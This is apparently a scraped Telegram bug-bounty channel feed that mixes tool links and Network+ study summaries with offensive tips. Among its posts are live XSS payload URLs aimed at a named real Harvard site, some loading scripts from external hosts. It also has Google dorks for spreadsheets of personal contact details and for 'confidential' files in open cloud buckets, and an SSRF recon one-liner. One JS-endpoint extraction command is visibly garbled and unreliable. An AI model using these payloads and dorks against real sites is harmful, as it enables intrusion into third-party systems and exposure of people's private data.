2246
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Security Certification Roadmap
https://pauljerimy.com/security-certification-roadmap/
⚡️LazyXss - Cross site scriptiong Testing Automation Tool v1.2
✅Link: github.com/iamunixtz/LazyXss
OAuth 2.0 Authentication Misconfiguration
https://shellmates.medium.com/oauth-2-0-authentication-misconfiguration-dcb811062f1d
site:target.com ext:xlsx "name" "@gmail.com" "phone"
Читать полностью…
⛓ Easily Identify SSRF on a Website Using a Single Command*
This approach leverages a combination of powerful tools:
- Findomain: Gathers all subdomains related to the target site.
- Httpx: Verifies the accessibility of these domains.
- Getallurls (gau): Extracts URLs from sources like AlienVault OTX, Wayback Machine, and Common Crawl.
- Qsreplace: Substitutes query string values in URLs with a user-specified value.
Steps:
1. Install the mentioned tools.
2. Run the following command:
findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace your.burpcollaborator.net
your.burpcollaborator.net with your server or Burp Collaborator address.
🕷Network+ (Network+ N10-008 book by Mike Myers) Summery Part-09
📱 Chapter-9 Network Naming: 🔗 Link
🔗 Previous Chapter
💡Stay tuned for the next chapter—I’ll post it next Friday!
#CyberSecurity #bugbounty #Network #infosec
🔸🔸🔸🔸🔸🔸🔸🔸
⚡ Boost The Channel
🕷 T.me/Spider_Crew
🔸🔸🔸🔸🔸🔸🔸🔸
🕷Network+ (Network+ N10-008 book by Mike Myers) Summery Part-07
📱 Chapter-7 Routing: 🔗 Link
🔗 Previous Chapter
💡Stay tuned for the next chapter—I’ll post it next Friday!
#CyberSecurity #bugbounty #Network #infosec
🔸🔸🔸🔸🔸🔸🔸🔸
⚡ Boost The Channel
🕷 T.me/Spider_Crew
🔸🔸🔸🔸🔸🔸🔸🔸
🕷Network+ (Network+ N10-008 book by Mike Myers) Summery Part-04 & Part-05
📱 Chapter 4 - Ethernet Basics: 🔗 Link
📱 Chapter 5 - Installing a Physical Network: 🔗 Link
🔗 Previous Chapter
💡Stay tuned for the next chapter—I’ll post it next Friday!
#CyberSecurity #bugbounty #Network #infosec
🔸🔸🔸🔸🔸🔸🔸🔸
⚡ Boost The Channel
🕷 T.me/Spider_Crew
🔸🔸🔸🔸🔸🔸🔸🔸
🕷Network+ (Network+ N10-008 book by Mike Myers) Summery Part-02
📱 Chapter 2 - Cabling and Topology: 🔗Link
🔗 Previous Chapter
💡Stay tuned for the next chapter—I’ll post it next Friday!
#CyberSecurity #bugbounty #Network #infosec
🔸🔸🔸🔸🔸🔸🔸🔸
⚡ Boost The Channel
🕷 T.me/Spider_Crew
🔸🔸🔸🔸🔸🔸🔸🔸
https://dolomite-slip-02b.notion.site/OWASP-ec050ff304844b43b763f66d5f422ffb?pvs=25
Читать полностью…
⚡️SqliSniper: Advanced Time-based Blind SQL Injection fuzzer for HTTP Headers
✅https://github.com/danialhalo/SqliSniper
https://youtube.com/playlist?list=PLIhvC56v63IJIujb5cyE13oLuyORZpdkL&si=fJ6igX_tZMyqp-lb
Читать полностью…
🔖Best Bug Bounty and Pentesting Methodology for Beginners: A Step-by-Step Guide
brutsecurity/best-bug-bounty-and-pentesting-methodology-for-beginners-a-step-by-step-guide-e8087dbcf879" rel="nofollow">https://medium.com/@brutsecurity/best-bug-bounty-and-pentesting-methodology-for-beginners-a-step-by-step-guide-e8087dbcf879
https://x.com/harshleenchawl2/status/1871283856520941582?t=AzXIt_WSpgN9YEoh20uB-A&s=35
Читать полностью…
Here Some Nuclei Templates which is new
https://github.com/olialkibriakonok/Nuclei-templates.git
⚡Google Dorks - Cloud Storage: site:http://s3.amazonaws.com "target[.]com" site:http://blob.core.windows.net "target[.]com" site:http://googleapis.com "target[.]com" site:http://drive.google.com "target[.]com"
👉Find buckets and sensitive data.
Combine:
site:http://s3.amazonaws.com | site:http://blob.core.windows.net | site:http://googleapis.com | site:http://drive.google.com "target[.]com"
Add something to narrow the results: "confidential” “privileged" “not for public release”
✅ Credit- Mike Takahashi
💻 All About Bug Bounty - Updated!
🔥https://github.com/daffainfo/AllAboutBugBounty
#BugBounty #bugbountytips
🔖Tiny XSS Payloads - A collection of tiny XSS Payloads that can be used in different contexts.
➡️ The DEMO available here: 🔗 Link
📱 Github: 🔗 Link
Haravard University 🎓
Bug : XSS
alert Bug 🤷♀️
https://bhi.fas.harvard.edu/?s=e%27%22()%26%25%3Czzz%3E%3CScRiPt%20%3Ealert(9155)%3C/ScRiPt%3E
https://bhi.fas.harvard.edu/?s=e%27%22()%26%25%3Czzz%3E%27%22%3E%3Cscript%20src=https://xss.report/c/{username}%3E%3C/script%3E
https://bhi.fas.harvard.edu/?s=e%27%22()%26%25%3Czzz%3E%27%22%3E%3Cscript%20src=https://jso-tools.z-x.my.id/raw/~/2FD8N5LJDAGNG%3E%3C/script%3EЧитать полностью…
JWT attacks
https://juba-notes.notion.site/JWT-attacks-4f62b2b641a84032bc624f8e8432345d
🕷Network+ (Network+ N10-008 book by Mike Myers) Summery Part-08
📱 Chapter-8 TCP/IP Applications: 🔗 Link
🔗 Previous Chapter
💡Stay tuned for the next chapter—I’ll post it next Friday!
#CyberSecurity #bugbounty #Network #infosec
🔸🔸🔸🔸🔸🔸🔸🔸
⚡ Boost The Channel
🕷 T.me/Spider_Crew
🔸🔸🔸🔸🔸🔸🔸🔸
🕷Network+ (Network+ N10-008 book by Mike Myers) Summery Part-06
📱 Chapter 6 - Ethernet Basics: 🔗 Link
🔗 Previous Chapter
💡Stay tuned for the next chapter—I’ll post it next Friday!
#CyberSecurity #bugbounty #Network #infosec
🔸🔸🔸🔸🔸🔸🔸🔸
⚡ Boost The Channel
🕷 T.me/Spider_Crew
🔸🔸🔸🔸🔸🔸🔸🔸
🕷Network+ (Network+ N10-008 book by Mike Myers) Summery Part-03
📱 Chapter 3 - Ethernet Basics: 🔗Link
🔗 Previous Chapter
💡Stay tuned for the next chapter—I’ll post it next Friday!
#CyberSecurity #bugbounty #Network #infosec
🔸🔸🔸🔸🔸🔸🔸🔸
⚡ Boost The Channel
🕷 T.me/Spider_Crew
🔸🔸🔸🔸🔸🔸🔸🔸
🕷I’ve summarized the first chapter of the Network+ N10-008 book by Mike Myers. If you find any issues or think the writing could be improved, feel free to submit an edit request. You can access my notes using this link:
🔗Chapter 1 - Network Models
💡Note: I strongly recommend reading the entire book yourself and not relying solely on the summary for your learning.
Stay tuned for the next chapter—I’ll post it next Friday!
#CyberSecurity #bugbounty #Network #infosec
🔸🔸🔸🔸🔸🔸🔸🔸
⚡ Boost The Channel
🕷 T.me/Spider_Crew
🔸🔸🔸🔸🔸🔸🔸🔸
☄️Subprober is a powerful and efficient subdomain scanning tool written in Python. With the ability to handle large lists of subdomains.
⚡️The tool offers concurrent scanning, allowing users to define their preferred concurrency level for faster results. Whether you are on Linux, Windows, or macos
➡️https://github.com/RevoltSecurities/Subprober
🔖 Free Tool for Finding Open S3 Buckets and Files
🎯 Purpose:Search for open Amazon S3 buckets and locate potentially interesting files efficiently.
✅ Tool Links:
Explore Open S3 Buckets: https://buckets.grayhatwarfare.com
📌 Why This is Useful:Helps identify misconfigured S3 buckets.
Uncover sensitive data or files accidentally exposed to the public.
⚡️Tiny-XSS-Payloads - A collection of tiny XSS Payloads that can be used in different contexts.
✅tinyxss.terjanq.me
#xss #BugBounty #CyberSecurity
Extract all endpoints from a JS File and take your bug 🐞
✅Method one
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt
Penetration Testing 101 Firewall Evasion
Firewall evasion allows attackers to bypass the initial barrier and potentially access sensitive information or systems within a network often by exploiting vulnerabilities or manipulating network traffic..
File password @TheGodEye